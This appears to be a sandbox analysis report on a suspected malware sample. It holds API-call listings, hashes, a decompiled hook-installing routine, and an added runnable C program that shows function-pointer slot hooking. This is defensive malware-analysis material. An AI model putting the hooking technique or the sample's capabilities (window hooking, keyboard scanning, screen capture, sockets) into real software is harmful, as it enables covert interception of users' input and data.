                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                           • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                           • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                           • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                           • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$AllocEntriesFreePaletteReleaseSystem
                                          • String ID:
                                          • API String ID: 3186361210-0
                                          • Opcode ID: 18967ae1e2cff0128b7e0999dfaca6c9dd43c8deffa828d87cab0de4b4972e37
                                          • Instruction ID: 674b110e34f19a3b9fb8c5e52561d1923f38500c18b63bd94bd74fc439de3d55
                                          • Opcode Fuzzy Hash: 18967ae1e2cff0128b7e0999dfaca6c9dd43c8deffa828d87cab0de4b4972e37
                                          • Instruction Fuzzy Hash: E1418B733145E042E72DCB259859BED3BE6E749B80F45D12AEE9987701CD3CC949C700
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 21%
                                          			E00C62FD8(void* __edx, void* __ebp, long long __rbx, long long __rcx, void* __rdx, long long __rsi, void* __rbp, long long __r8, long long _a8, long long _a16, void* _a24, long _a32) {
                                          				void* _v40;
                                          				void* _v64;
                                          				long _v72;
                                          				long long _v88;
                                          				void* __rdi;
                                          				long _t39;
                                          				long _t40;
                                          				long _t43;
                                          				long _t46;
                                          				long _t47;
                                          				void* _t65;
                                          				long long _t66;
                                          				long long _t71;
                                          				long long* _t72;
                                          				intOrPtr* _t74;
                                          				void* _t88;
                                          				void* _t90;
                                          				long long _t93;
                                          				void* _t94;
                                          				void* _t104;
                                          				long long _t105;
                                          				intOrPtr _t106;
                                          
                                          				_t94 = __rbp;
                                          				_t75 = __rbx;
                                          				_a8 = __rbx;
                                          				_a16 = __rsi;
                                          				_a24 = __r8;
                                          				_t104 = __rdx;
                                          				_t105 = __rcx;
                                          				r15d = 0;
                                          				r12d = 0;
                                          				_t47 = 0;
                                          				r9d =  *0xc956b4; // 0x3
                                          				if(r9d == 0) {
                                          					L6:
                                          					if(( *(_t105 + 8) & 0x00000001) == 0) {
                                          						_t106 =  *((intOrPtr*)(_t105 + 0x10));
                                          					} else {
                                          						r12d =  *(_t105 + 0x18) & 0x0000ffff;
                                          					}
                                          					_t39 = E00C62888(_t65, _t75,  &_v64);
                                          					_t46 = _t39;
                                          					if(_t39 == 0) {
                                          						_t66 =  *((intOrPtr*)(_t105 + 0x28));
                                          						_t93 = _v64;
                                          						if(_t66 == 0) {
                                          							_t66 =  *((intOrPtr*)(_t105 + 0x20));
                                          						}
                                          						 *((long long*)(_t93 + 0x28)) = _t66;
                                          						_v88 = 0xc62910;
                                          						r9d = r12w & 0xffffffff;
                                          						_t88 =  *_t105;
                                          						E00C64230(0xc62910, _t75, _t104, _t88, _t94, _t106);
                                          						_t77 = 0xc62910;
                                          						if(0xc62910 == 0) {
                                          							r9d = r12w & 0xffffffff;
                                          							_t88 =  *_t105;
                                          							E00C64068(0xc62910, _t104, _t88, _t90, _t93, _t94, _t106);
                                          							_t77 = 0xc62910;
                                          						}
                                          						if(_t77 == 0) {
                                          							_t46 = 2;
                                          							_v72 = 2;
                                          						} else {
                                          							_a32 = 0;
                                          							_t18 = _t88 + 0x38; // 0x40
                                          							r8d = _t18;
                                          							if(VirtualProtect(??, ??, ??, ??) == 0) {
                                          								_t43 = GetLastError();
                                          								_t46 = _t43;
                                          								_v72 = _t43;
                                          							} else {
                                          								 *((long long*)(_t93 + 0x30)) = _t105;
                                          								if( *((intOrPtr*)(_t105 + 0x30)) == _t90) {
                                          									 *((long long*)(_t105 + 0x30)) =  *_t77;
                                          								}
                                          								 *((long long*)(_t93 + 0x10)) =  *_t77;
                                          								 *((long long*)(_t93 + 0x18)) = _t77;
                                          								 *((long long*)(_t93 + 0x20)) =  *_t77;
                                          								 *_t77 =  *((intOrPtr*)(_t93 + 0x28));
                                          								r8d = _a32;
                                          								VirtualProtect(??, ??, ??, ??);
                                          								 *(_t93 + 0x38) =  *(_t93 + 0x38) | 0x00000101;
                                          								EnterCriticalSection(??);
                                          								_t71 =  *0xc95ab0; // 0xc95ab0
                                          								 *_t93 = _t71;
                                          								 *((long long*)(_t93 + 8)) = 0xc95ab0;
                                          								 *((long long*)(_t71 + 8)) = _t93;
                                          								 *0xc95ab0 = _t93;
                                          								LeaveCriticalSection(??);
                                          								_t46 = 0;
                                          								_v72 = 0;
                                          								_t72 = _a24;
                                          								if(_t72 != 0) {
                                          									 *_t72 = _t93;
                                          								}
                                          							}
                                          						}
                                          						if(_t46 != 0) {
                                          							E00C61E84();
                                          						}
                                          					}
                                          					_t40 = _t46;
                                          					goto L26;
                                          				} else {
                                          					_t74 =  *0xc956b8; // 0x20dcd802160
                                          					while(_t104 !=  *_t74) {
                                          						_t47 = _t47 + 1;
                                          						_t74 = _t74 + 8;
                                          						if(_t47 < r9d) {
                                          							continue;
                                          						}
                                          						goto L6;
                                          					}
                                          					_t40 = 0;
                                          					L26:
                                          					return _t40;
                                          				}
                                          			}
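Reading the decompiled E00C62FD8 above: it is a hook installer. It first compares its second argument against the table at 0xC956B8 (count at 0xC956B4) and returns 0 without patching on a match; otherwise it resolves a function-pointer slot (E00C64230, with E00C64068 tried when that fails; a miss returns 2), obtains a record from E00C62888, unprotects the slot with VirtualProtect (a failure returns GetLastError()), saves the slot's current value into the record at +0x10 and +0x20 together with the slot address at +0x18, writes the record's replacement pointer (+0x28) into the slot, restores protection, ORs 0x101 into the record's flags at +0x38, and links the record at the head of the circular doubly linked list rooted at 0xC95AB0 under a critical section. The caller's descriptor also receives the original pointer at its offset 0x30 when it has none yet, presumably so the replacement can call through to it. The C program below is an added illustration of that pattern and is neither the sample's code nor part of this report: the field names, the name-keyed target table, the pthread mutex standing in for the critical section, and the plain writable slot standing in for the VirtualProtect-guarded one are all assumptions made so it builds and runs on a POSIX host, and the remove_hook step, which the decompilation does not contain, is added to show why the original pointer is kept.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <pthread.h>

typedef int (*target_fn)(int);

/* Hook record. The offsets in the comments are those the decompilation of
   E00C62FD8 reads or writes; the field names are our assumption. */
typedef struct hook_record {
    struct hook_record *next;  /* +0x00 */
    struct hook_record *prev;  /* +0x08 */
    target_fn original;        /* +0x10 value the slot held before patching */
    target_fn *slot;           /* +0x18 address of the patched slot */
    target_fn hook;            /* +0x28 replacement written into the slot */
    unsigned flags;            /* +0x38 OR-ed with 0x101 once installed */
} hook_record;

/* Sentinel node of the circular list (the sample's global at 0xC95AB0);
   the mutex stands in for the sample's critical section. */
static hook_record g_hooks = { &g_hooks, &g_hooks, NULL, NULL, NULL, 0 };
static pthread_mutex_t g_hooks_lock = PTHREAD_MUTEX_INITIALIZER;

/* Constructed stand-in for the pointer table the sample patches. It is
   ordinary writable memory here, so no VirtualProtect equivalent is needed. */
static int real_open(int x)  { return x + 1; }
static int real_write(int x) { return x * 2; }
static struct { const char *name; target_fn fn; } g_table[] = {
    { "open",  real_open  },
    { "write", real_write },
};

/* Stand-in for E00C64230/E00C64068: find the slot for a name. */
static target_fn *find_slot(const char *name) {
    for (size_t i = 0; i < sizeof g_table / sizeof g_table[0]; i++)
        if (strcmp(g_table[i].name, name) == 0)
            return &g_table[i].fn;
    return NULL;
}

/* Install a hook. Returns 0 on success, 2 when the slot cannot be found
   (the sample returns 2 on that path) and 12 when allocation fails. */
int install_hook(const char *name, target_fn hook, hook_record **out) {
    target_fn *slot = find_slot(name);
    if (slot == NULL) return 2;
    hook_record *rec = calloc(1, sizeof *rec);
    if (rec == NULL) return 12;
    rec->original = *slot;        /* keep the original before overwriting */
    rec->slot     = slot;
    rec->hook     = hook;
    *slot         = hook;         /* the actual patch */
    rec->flags   |= 0x101;
    pthread_mutex_lock(&g_hooks_lock);
    rec->next = g_hooks.next;     /* insert at the head, after the sentinel */
    rec->prev = &g_hooks;
    g_hooks.next->prev = rec;
    g_hooks.next = rec;
    pthread_mutex_unlock(&g_hooks_lock);
    if (out != NULL) *out = rec;
    return 0;
}

/* Undo: unlink the record and restore the saved pointer (not in the sample). */
void remove_hook(hook_record *rec) {
    pthread_mutex_lock(&g_hooks_lock);
    rec->prev->next = rec->next;
    rec->next->prev = rec->prev;
    pthread_mutex_unlock(&g_hooks_lock);
    *rec->slot = rec->original;
    free(rec);
}

/* A replacement that calls through the saved original and tags the result. */
static hook_record *g_open_rec;
static int open_hook(int x) { return g_open_rec->original(x) + 1000; }

/* Call "open" through its slot, as a patched program would. */
int call_open(int x) { return g_table[0].fn(x); }

/* Worked run: install, call through the slot, uninstall. Returns the value
   seen while hooked (1002 for input 1), or -1 if any step misbehaves. */
int demo(void) {
    hook_record *rec = NULL;
    if (install_hook("nope", open_hook, NULL) != 2) return -1;
    if (install_hook("open", open_hook, &rec) != 0 || g_hooks.next != rec) return -1;
    g_open_rec = rec;
    int hooked = call_open(1);
    remove_hook(rec);
    if (call_open(1) != 2 || g_hooks.next != &g_hooks) return -1;
    return hooked;
}

int main(void) {
    printf("hooked call_open(1) = %d\n", demo());
    return 0;
}
```

The list rooted at the sentinel is what lets the sample later find every patched slot and its saved original again; in the decompilation that bookkeeping, not the pointer write itself, is the part guarded by the critical section, and the example keeps the same split.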

                                           Per-statement address column of the decompiled E00C62FD8 listing, collapsed: 0x00c62fd8 .. 0x00c631c6 (0x00000000 entries omitted).

                                          APIs
                                          • VirtualProtect.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00000002,00C6333A,?,?,00000004,00C6320E), ref: 00C630CC
                                          • VirtualProtect.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00000002,00C6333A,?,?,00000004,00C6320E), ref: 00C6311C
                                          • EnterCriticalSection.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00000002,00C6333A,?,?,00000004,00C6320E), ref: 00C63130
                                          • LeaveCriticalSection.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00000002,00C6333A,?,?,00000004,00C6320E), ref: 00C6315D
                                          • GetLastError.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00000002,00C6333A,?,?,00000004,00C6320E), ref: 00C6317B
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: CriticalProtectSectionVirtual$EnterErrorLastLeave
                                          • String ID:
                                          • API String ID: 653387826-0
                                          • Opcode ID: 1c82b7c32154be67ade6178bcb65a882e59a2dee55f9bcb2a2b2d67d90423c17
                                          • Instruction ID: f00608a2d5dc32fea45c7d8f25a0c178f215351e5f9115dda34c3835bd4faf0d
                                          • Opcode Fuzzy Hash: 1c82b7c32154be67ade6178bcb65a882e59a2dee55f9bcb2a2b2d67d90423c17
                                          • Instruction Fuzzy Hash: 27513936215B8182EB75CF12F884B5EB3A4F749B84F448226DE8E47B24DF38C64AC700
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$AllocEntriesFreePaletteReleaseSystem
                                          • String ID:
                                          • API String ID: 3186361210-0
                                          • Opcode ID: b42a28a2fbe6b83df5252cb814859cc9ba61b7794688c65ca4d3ee557ff683d8
                                          • Instruction ID: 30a1b0f9b8cb71a45cebd801be3851cd0c14fa1ead8b7986d161eb7d06184536
                                          • Opcode Fuzzy Hash: b42a28a2fbe6b83df5252cb814859cc9ba61b7794688c65ca4d3ee557ff683d8
                                          • Instruction Fuzzy Hash: 06411873314AD042E729CB25A8557ED3FE6E759F80F4AC11BEA9947702DA39C54AC700
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$AllocEntriesFreePaletteReleaseSystem
                                          • String ID:
                                          • API String ID: 3186361210-0
                                          • Opcode ID: e93f558a66880771c7ec8c04669a1fe52827acbb5d299f9f6a52db81bc60e0a4
                                          • Instruction ID: 4bdf8c2214af6026868747c018b64cc292b0da6e06ee9fa182575133e00d3d51
                                          • Opcode Fuzzy Hash: e93f558a66880771c7ec8c04669a1fe52827acbb5d299f9f6a52db81bc60e0a4
                                          • Instruction Fuzzy Hash: F54158733046D042E719CB25A8587ED3BE5E349F80F5AC129EE9A87702DE39C589C740
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: PathRemove$ArgsBlanksByteCharFreeHeapMultiWidelstrlen
                                          • String ID:
                                          • API String ID: 1571430455-0
                                          • Opcode ID: c77c448289dfb0efc7e2056a9ca0fc8ffdd069d2fc6a1e03b186567b7ff2385a
                                          • Instruction ID: 448a6c3f6795251dc92e8fe66cb4dd9f475ddb38bfb798cfcee5681038a62e22
                                          • Opcode Fuzzy Hash: c77c448289dfb0efc7e2056a9ca0fc8ffdd069d2fc6a1e03b186567b7ff2385a
                                          • Instruction Fuzzy Hash: CB219132311B4186EB24DF22A844B5C7365FB88BF4F549721AE6E03BA4DF38C599C304
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: File$CloseCreateErrorHandleLastReadSize
                                          • String ID:
                                          • API String ID: 3577853679-0
                                          • Opcode ID: 534a6af04a41ebd7af717157045395183d1a68295fd570842df872a23fcf8e84
                                          • Instruction ID: 4dff1b8c2fcb308c35b1544ca9af6ba343beafe5175fa7ca9fae40d3929449c0
                                          • Opcode Fuzzy Hash: 534a6af04a41ebd7af717157045395183d1a68295fd570842df872a23fcf8e84
                                          • Instruction Fuzzy Hash: 0321713230475187F728DFA6A984719B6A1A784FF4F1483259E3947BE4DF38C9468701
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00C69AD0: EnterCriticalSection.KERNEL32 ref: 00C69AE6
                                            • Part of subcall function 00C69AD0: LeaveCriticalSection.KERNEL32 ref: 00C69B18
                                            • Part of subcall function 00C69D50: GetClassLongPtrA.USER32 ref: 00C69D6D
                                          • GetWindowLongPtrA.USER32 ref: 00C69B9A
                                            • Part of subcall function 00C6265C: VirtualProtect.KERNEL32 ref: 00C626A3
                                            • Part of subcall function 00C6265C: memcpy.NTDLL ref: 00C626E5
                                          • EnterCriticalSection.KERNEL32 ref: 00C69BCA
                                          • LeaveCriticalSection.KERNEL32 ref: 00C69BF7
                                          • SetWindowLongPtrA.USER32 ref: 00C69C06
                                          • GetWindowLongPtrA.USER32 ref: 00C69C15
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: CriticalLongSection$Window$EnterLeave$ClassProtectVirtualmemcpy
                                          • String ID:
                                          • API String ID: 2189526339-0
                                          • Opcode ID: 1b5142882a87c563db19f04a8350a57ce3bc143e2fdc48061c82adbe2f2a7d1b
                                          • Instruction ID: 23d92ff8158a420be443747d705abbac37f0de1e09e3cc74556e375ac4bc69c7
                                          • Opcode Fuzzy Hash: 1b5142882a87c563db19f04a8350a57ce3bc143e2fdc48061c82adbe2f2a7d1b
                                          • Instruction Fuzzy Hash: B6215771605F5082FB20DF16F88475973A8F788F90F968629EE5A43764EF38C95AC344
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • VirtualProtect.KERNEL32(?,?,?,?,?,00C62B3A,?,?,?,00C62839,?,?,?,?,00C62147), ref: 00C62C28
                                          • VirtualProtect.KERNEL32(?,?,?,?,?,00C62B3A,?,?,?,00C62839,?,?,?,?,00C62147), ref: 00C62C4A
                                          • VirtualProtect.KERNEL32(?,?,?,?,?,00C62B3A,?,?,?,00C62839,?,?,?,?,00C62147), ref: 00C62C64
                                          • VirtualProtect.KERNEL32(?,?,?,?,?,00C62B3A,?,?,?,00C62839,?,?,?,?,00C62147), ref: 00C62C9C
                                          • GetLastError.KERNEL32(?,?,?,?,?,00C62B3A,?,?,?,00C62839,?,?,?,?,00C62147), ref: 00C62CA4
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: ProtectVirtual$ErrorLast
                                          • String ID:
                                          • API String ID: 1469625949-0
                                          • Opcode ID: 37942eebea2ef01a9866a027f3d1cdb914bd492b49a0c66564aff55f4e739575
                                          • Instruction ID: 82f5dee2bf69b57d9484524caaa086428c39bd526cddd01a5abbdbaca3169b2f
                                          • Opcode Fuzzy Hash: 37942eebea2ef01a9866a027f3d1cdb914bd492b49a0c66564aff55f4e739575
                                          • Instruction Fuzzy Hash: 62217F36604A55E7EB24CF2AE44061DBB74F389F94F644112DF8993B28CF39D996CB40
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: Ascii$KeyboardLayoutListScanmemset
                                          • String ID:
                                          • API String ID: 648619571-0
                                          • Opcode ID: 94a68edb06336e36832264f6bbd4a2f2f445d491a2a526d512bdd80562666cba
                                          • Instruction ID: 5a360afa34382edafc2149e45ae03ce8e09659279f1b65b949b4962985b42302
                                          • Opcode Fuzzy Hash: 94a68edb06336e36832264f6bbd4a2f2f445d491a2a526d512bdd80562666cba
                                          • Instruction Fuzzy Hash: BB21B336618A8097F721CB29F8447DA37A6F3C5755F988216DAD903699CF3CC54ECB04
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • HeapAlloc.KERNEL32 ref: 00C76075
                                          • HeapAlloc.KERNEL32 ref: 00C76099
                                          • HeapFree.KERNEL32 ref: 00C760BB
                                          • HeapAlloc.KERNEL32 ref: 00C760DA
                                            • Part of subcall function 00C75F38: HeapFree.KERNEL32(?,?,00000000,00C760F9), ref: 00C75F52
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$Alloc$Free
                                          • String ID: 1.1.4
                                          • API String ID: 1549400367-362073112
                                          • Opcode ID: ccebd975a8d273fb9a5b7265724b5fb93be2d146a8635b4578c663a4eab212bc
                                          • Instruction ID: baec4790f7eafe393f657f329b42f87e4a0d841e20ace9ea4c2960db3dc5cc36
                                          • Opcode Fuzzy Hash: ccebd975a8d273fb9a5b7265724b5fb93be2d146a8635b4578c663a4eab212bc
                                          • Instruction Fuzzy Hash: 2B212EA2612F0082FB15DF32E85475923E4EB9CF58F648225CE1D46768EF38C596C398
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • WSAStartup.WS2_32 ref: 00C68C00
                                          • HeapAlloc.KERNEL32 ref: 00C68C13
                                          • memset.NTDLL ref: 00C68C2A
                                          • memcpy.NTDLL ref: 00C68C3A
                                          • StrDupA.SHLWAPI ref: 00C68C42
                                            • Part of subcall function 00C6C7B8: InitializeCriticalSection.KERNEL32(?,?,?,?,00000008,00C68C59), ref: 00C6C7DB
                                            • Part of subcall function 00C6C7B8: CreateEventA.KERNEL32(?,?,?,?,00000008,00C68C59), ref: 00C6C7EC
                                            • Part of subcall function 00C6C7B8: CreateThread.KERNELBASE ref: 00C6C813
                                            • Part of subcall function 00C6C7B8: GetLastError.KERNEL32(?,?,?,?,00000008,00C68C59), ref: 00C6C82A
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: Create$AllocCriticalErrorEventHeapInitializeLastSectionStartupThreadmemcpymemset
                                          • String ID:
                                          • API String ID: 3488021426-0
                                          • Opcode ID: 34b3dd0ed6820cacfe108102cadd2f676e73a015503047924468694898d44d0d
                                          • Instruction ID: 09ac67a3bd9c10a45602b124807c0eb22f945dc5a0236c19e4400b8d32993f47
                                          • Opcode Fuzzy Hash: 34b3dd0ed6820cacfe108102cadd2f676e73a015503047924468694898d44d0d
                                          • Instruction Fuzzy Hash: 0A113636302B4196EB24DF12A894B5873A5FB88F80F998531DE5A47718DF38D99ACB40
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • HeapAlloc.KERNEL32(?,?,00000000,00C69590), ref: 00C68DCE
                                          • CreateCompatibleDC.GDI32 ref: 00C68DE4
                                          • CreateCompatibleBitmap.GDI32 ref: 00C68DF6
                                          • SelectObject.GDI32(?,?,00000000,00C69590), ref: 00C68E08
                                          • CreateMutexA.KERNEL32(?,?,00000000,00C69590), ref: 00C68E19
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: Create$Compatible$AllocBitmapHeapMutexObjectSelect
                                          • String ID:
                                          • API String ID: 533441823-0
                                          • Opcode ID: f0000555fde949887d5020d45287be6648f277f05ab8a5f5c9edd8689431a93c
                                          • Instruction ID: e63117a4506ae821bcc8161ead028060721324561f5fa089564f9d070aa75c0a
                                          • Opcode Fuzzy Hash: f0000555fde949887d5020d45287be6648f277f05ab8a5f5c9edd8689431a93c
                                          • Instruction Fuzzy Hash: A9112A76711B5082EB24CF26E84471977A5F788F84F588229DF8D43B18DF38D459C748
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: setsockopt$closesocketconnectshutdownsocket
                                          • String ID:
                                          • API String ID: 3842021557-0
                                          • Opcode ID: b7b94f5deee25e66946f8415531661a10960e7bf1573d31f98bc6243642d20a9
                                          • Instruction ID: 4711884653a4553e17120ef5a18c8aeb3275851a4cb1dd7ba5934d2df16a345e
                                          • Opcode Fuzzy Hash: b7b94f5deee25e66946f8415531661a10960e7bf1573d31f98bc6243642d20a9
                                          • Instruction Fuzzy Hash: 4A01927130064182EB209F11E884766A721FB85BB4F948324DE7647BE4EF3EC9888705
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcat$CloseEventHandleOpenlstrcpy
                                          • String ID:
                                          • API String ID: 821562950-0
                                          • Opcode ID: dfa0ae42ccbf6692c93d556723b96de8f7dfc535e7ced0363a452f264ae07694
                                          • Instruction ID: 6c19d0e56daa2a905a6fecf9310477a6781b66e917a29524d25d0139c6bd89de
                                          • Opcode Fuzzy Hash: dfa0ae42ccbf6692c93d556723b96de8f7dfc535e7ced0363a452f264ae07694
                                          • Instruction Fuzzy Hash: B1014472304946D2FF258B14F8947DA7361FB88B88F84C222964E07A64DF3CC54EC748
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SetEvent.KERNEL32(?,?,00000000,00C7F6DA,?,?,00000000,00C7F8A9,?,?,?,00C6C267), ref: 00C7D4FD
                                          • WaitForSingleObject.KERNEL32(?,?,00000000,00C7F6DA,?,?,00000000,00C7F8A9,?,?,?,00C6C267), ref: 00C7D512
                                          • CloseHandle.KERNEL32(?,?,00000000,00C7F6DA,?,?,00000000,00C7F8A9,?,?,?,00C6C267), ref: 00C7D51F
                                          • CloseHandle.KERNEL32(?,?,00000000,00C7F6DA,?,?,00000000,00C7F8A9,?,?,?,00C6C267), ref: 00C7D539
                                          • CloseHandle.KERNEL32(?,?,00000000,00C7F6DA,?,?,00000000,00C7F8A9,?,?,?,00C6C267), ref: 00C7D553
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: CloseHandle$EventObjectSingleWait
                                          • String ID:
                                          • API String ID: 2857295742-0
                                          • Opcode ID: 87d0e0c747dcab134f6c8fc9f1c45709c33c6a08fcfbd272cadd49876fb8f899
